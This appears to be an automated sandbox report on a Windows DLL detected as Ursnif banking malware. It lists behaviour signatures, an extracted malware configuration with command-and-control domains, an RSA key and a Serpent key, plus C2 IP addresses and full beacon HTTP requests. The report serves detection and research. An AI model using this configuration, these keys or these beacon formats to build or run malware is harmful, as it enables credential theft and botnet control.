Windows Analysis Report 61b85f75e6a7c.dll

Overview

General Information

Sample Name: 61b85f75e6a7c.dll
Analysis ID: 539453
MD5: 26788bdf519813ff2600570a5c8e23d9
SHA1: 44f22a053e84cd7afcf34a4fa19dbf512c8a624d
SHA256: 25f74513f1f0a72453bf096337daba7268bf77371f7fc210f56672f52b7b3af1
Tags: brtdllexegoziisfbursnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Writes to foreign memory regions
PE file has a writeable .text section
Writes or reads registry keys via WMI
Machine Learning detection for sample
Allocates memory in foreign processes
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Registers a DLL
PE / OLE file has an invalid certificate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000005.00000002.671518506.0000000002E10000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"RSA Public Key": "B+xl4hUTn5rXiL0afazu2ddSc/ECZk5wqODKe0fS2KdIXHYzLOi+LPPP1HVzyCQFE2ZPog7imXfWyeJPGgVZO8mmh7g0OCbF0hBgHX6wj0qY1fBDcQxYjLnhuuJTPFt0voqEKHGGIgbiz86prZpdJls6h0dECkyqCOUP77xD4bHwJFYwmMp7govarzlBsbdorQ4qNFnd4O2rK1GEuQisAwdMkb4j9MqHf7vkHewrh1BGBeNcr85NjoxXAnfZDuX+M7b1dWoszYHJF1rgWzk4yz7fc+7Q4leAIr2PkWbTRuRpOe4P6Ok01hKGTLORQhRgWw6Mv2aRFMimHgiQWhhaHetICEhMcBl5C0yxhZCOhu4=", "c2_domain": ["microsoft.com/windowsdisabler", "windows.update3.com", "berukoneru.website", "gerukoneru.website", "fortunarah.com"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}
Machine Learning detection for sample
Source: 61b85f75e6a7c.dll Joe Sandbox ML: detected

Compliance:

barindex
Uses 32bit PE files
Source: 61b85f75e6a7c.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49812 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49813 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49814 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49816 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49817 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49819 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49820 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49821 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49822 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49825 version: TLS 1.2
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.593278567.0000000004C50000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.601958378.0000000004D10000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.587800871.0000000006510000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.605566748.0000000006510000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.587317777.0000000005AC0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.598679645.00000000061B0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.608276934.00000000061B0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.593278567.0000000004C50000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.601958378.0000000004D10000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.587800871.0000000006510000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.605566748.0000000006510000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.587317777.0000000005AC0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.598679645.00000000061B0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.608276934.00000000061B0000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 0000002A.00000003.671336061.000002081FBEF000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.668289338.000001C8ACDEF000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 0000002A.00000003.671336061.000002081FBEF000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.668289338.000001C8ACDEF000.00000004.00000040.sdmp
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0102D1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_0102D1A3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_010259E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 0_2_010259E6
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0103F63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_0103F63F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053DF63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 3_2_053DF63F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053CD1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 3_2_053CD1A3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053C59E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 3_2_053C59E6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04ABF63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 4_2_04ABF63F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AAD1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 4_2_04AAD1A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AA59E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 4_2_04AA59E6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C3F63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 5_2_04C3F63F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C259E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 5_2_04C259E6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C2D1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 5_2_04C2D1A3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0103E230 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_0103E230

Networking:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: berukoneru.website
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 3.20.161.64 187 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 79.110.52.144 187 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: windows.update3.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 18.219.227.107 187 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 3.12.124.139 187 Jump to behavior
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View ASN Name: V4ESCROW-ASRO V4ESCROW-ASRO
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /tire/jd_2FYT4kZR8w841QcBB1/tR81NFI9aRqohSRO/X0dydnORWplT5uR/5w00AG_2B_2FJ09dQQ/WUxRePiB4/GTOJFQ8FP8igXEjbgkH9/zEak3366_2FSVu5YatC/6c8yBLY3VgDZriaVuWUlRJ/NfUpYHR7DlV_2/FmC6rrvj/IWZqq_2FXZYrZ6Jfrjl4wOK/cOGNowVtID/CNlyDmEUAcdL6Nggn/Q6FP_2FvO/_2BU9JHdR/p.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/yIaXbfYof9IP/8B_2BPJ4_2B/hMnTiYTFHmvWMq/Om0JbLkmD_2F5koSu_2FY/nLk_2FKibFUJ9gOk/MZT8jf1B5RdC0UZ/6Z4No8ixNFmBVmH7Bj/uDf3BhOPM/DLBe_2Bd6mkqoP7YTIID/XBuFTJLHbx1D4QjnBWn/TnGiYGHPz2eGN6knS8Er2o/_2B5QVwmx2J_2/BE8gCb3N/ingbPXC9ZN_2BMhH2cvWH8p/CYnerQtz/Ddd.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/aZ8BheahozwZJezagn3wPqr/iz35YcAb_2/F5jeyfvVg2ICfCrEk/0rrw6u3U7gic/uqJTyp4A5eQ/0U2GqSt0iiLbUx/HO3viOhQ8WkG8vbfTOB_2/BnaqEkGKFXXYKGIR/Ctbh99dX8lvtuYg/YlazQ5uDO_2FKEL9Q_/2BJjb_2Fo/n4TKwNU4Z7gGvATNQb4t/rYS_2FADS/RnX9qstM/g.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/qmvui3Jef80_2BIeM_2BXh/O_2By54KPinsD/_2BFfpah/5k89w5bXqU7DEWhQp1iBEy2/_2BnU_2FsR/sUo3C8aISdxyIYl8W/JynqV_2BmddH/AgiN2_2BUrO/VCPQbezXreMebQ/izeoYIW_2BTEh6B2Zh_2B/L3PgbMDpsuFq53n5/obVS_2BHmsXbkex/IxU7ONkaq6S5id4E4C/VTSP2pp87/7bclEnvP5UuFRz5_2FIN/q_2FKVUn/a3U.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/pXEvhesP8JJkQtOX4Z5G/OiJKf20ix2ZGR09v_2B/AwevbnlWqTi_2FbmjeIBIJ/B8iREIEDTHJ8C/QPwxSlTX/9Ss6_2FUQqUE8Rtt6tkm28v/8Qb_2FbAb4/RcCK4EpQ3Lh0e_2BV/nW7_2F9KVPTc/RWwFawwnn1T/NBQ509K2MeA0Zg/X_2BL3B2nl1ByESW4otQy/_2FmAs1Ly6/iqZ3GWXa.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/XmFjtmy1jR6lateNyuPVYzk/zqxAUph9t_/2FhKh_2BKiBZEq6Pk/avtEml_2FYjs/Y8y781fyUpX/C_2FGsjVf_2F1i/tI0L_2Fc4mVHQ5jOtMGU8/MLBmn_2F0B4RgjE1/vjwq5A2_2B3O0OF/2xAZRByvalCt4EW7PP/8v2xGWGrY/70z8u8ipgSqR2XldqMkC/Q_2FRHW9LM53wtTl2y8/wrMCO.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/tEXumA952Z/iljgXIorkNbq6MNPU/M3Mb2CH8XEAs/ZvNkij3gQew/dxKPUhxVjzkBtZ/B3kMEs_2FJYP69uLJ0Zru/_2BYjun6ZVTrWBF0/nSePp_2BxhkopWf/iGbA1ax9WTenbT0BwC/JetFByiwf/3LiswTAhhMHb0jpdGXHw/RYbbpWHEDIwmZCcWi7e/zfbtXmV0tr/6_2BifPd.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/gzRMSfagaZDYqNWCuNWpBQY/d3QH3HcNtD/fG3zb1_2FY310Wc1Z/tU68j9ArrsrY/cG2nzLaOesJ/1fJaUxYEiS_2Fq/6VuTPCoO1fL43Db5nwE4B/eNIHObz48Uk8thb4/s2ZGHDbOs4GyVjB/HB5iQTw6wsHP9eF2fL/ehbbJ4i3G/wutxyBgCPuYINeY4btAA/_2FftqK8_2FJ53N0BbQ/E4DqjTtkOXgod/z7et.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/k0k9N5zvmOwLqrZ9t/mA_2BT5LewRQ/XIHVxnLBVoU/TCE3xXfm5Bjx_2/FNwBkfDvRbJwwM4AJLewo/S2GmqFJJAf16v117/0Fd8Da4X45K7ewO/ZOOFQH9lFoxITYmiaW/UM4b3mHcB/fh9cKbdZnHyGiZkOZevh/xKEuDuLDKEmBX5F2T0A/HlQglDHz0FPghDE04k7Rtp/qlpZkGrY6jSqN/zGqWq5UgJ/rU.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/YD_2F3yJEGCuLOsTrEXJLr/HYLMnHFPJYjiw/7tKlG8tS/_2BbBwzFFUBrFGVOQLc5STZ/vcc52sXSbU/E9hymn9Lr8ZbD9qxB/Q3FPG7MgMTRh/kGaKVJ7xEwY/wcc7fc8ZQUc61Z/HBzqpDy8uRQEtHRcSSjiO/YH3881lPkApc1W7g/7TBJUbFugsSMYgd/TFU1BUGgDWNFTw3w_2/FKBKIQxkn/wyKgErA3/rpA.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/KjB2BgkWWh/2R_2Fkj8GC7yaP1kC/DPb_2B003_2B/KSHrvwTkEkd/_2FAMHiah0zctf/nNbEHjkCSlyuZxandMk7W/125Nt4kKNIyzhV_2/FpQlU2nlzM_2FEI/PEryRBP68LWoGHV3sm/y9L4VUWvc/E0UlFXDmQ0_2F2mVHcN_/2B13NnOs91EWboOkL1Q/soeab74L05htIewL3_2FTu/VD2Jph.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/m4jBg57LO/F3omyPFCoq2BsJvvqQjq/M_2Frtvqdkes1JW5OTL/BNOx14m03YJ94TjlPw0PZA/GLczTuNVmCYMu/71GtDP5r/ukrg4HqiGfIkYNEYalZxMet/SDWbFyptRt/KM_2FafHnmbZCQsUs/pLVEK0s2DOMd/NxrlfGMBoYt/93NMnwEIHPr7kq/Wl1k8ZjV32EJB93_2FhHV/Qjw6VJUmVv/3MpXPnj1D/cD.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: loaddll32.exe, 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.518452737.000000000333A000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520647340.0000000003333000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.655671376.0000000003335000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.471079940.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.674023978.0000000003336000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.654359694.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.655489490.000000000332C000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.527705942.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.654149765.00000164EB229000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.667097557.00000164EB22A000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000018.00000003.653604031.00000164EB3D9000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.555671260.00000164EB3D4000.00000004.00000001.sdmp String found in binary or memory: http://crl.microsoftq
Source: loaddll32.exe, 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 00000018.00000002.705821003.00000164E2DF3000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001A.00000002.657039685.000002DABC760000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: loaddll32.exe, 00000000.00000003.472208174.0000000000FF4000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.472191920.0000000000FEB000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.472229200.0000000000FF5000.00000004.00000001.sdmp String found in binary or memory: http://schemas.mic
Source: powershell.exe, 00000018.00000002.669107613.00000164D2D91000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.651339407.000002DABC551000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001A.00000002.657039685.000002DABC760000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: rundll32.exe, 00000005.00000003.470823286.0000000002F94000.00000004.00000001.sdmp String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
Source: loaddll32.exe, 00000000.00000003.472208174.0000000000FF4000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.472191920.0000000000FEB000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.472229200.0000000000FF5000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.471060406.000000000338D000.00000004.00000001.sdmp String found in binary or memory: https://aka.ms/MicrosoftEdgeDownload"
Source: regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmp String found in binary or memory: https://berukoneru.website/
Source: regsvr32.exe, 00000003.00000003.520125804.000000000330C000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.527683209.0000000003310000.00000004.00000001.sdmp String found in binary or memory: https://berukoneru.website/tire/KjB2BgkWWh/2R_2Fkj8GC7yaP1kC/DPb_2B003_2B/KSHrvwTkEkd/_2FAMHiah0zctf
Source: regsvr32.exe, 00000003.00000003.517457436.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmp String found in binary or memory: https://berukoneru.website/tire/aZ8BheahozwZJezagn3wPqr/iz35YcAb_2/F5jeyfvVg2ICfCrEk/0rrw6u3U7gic/uq
Source: powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
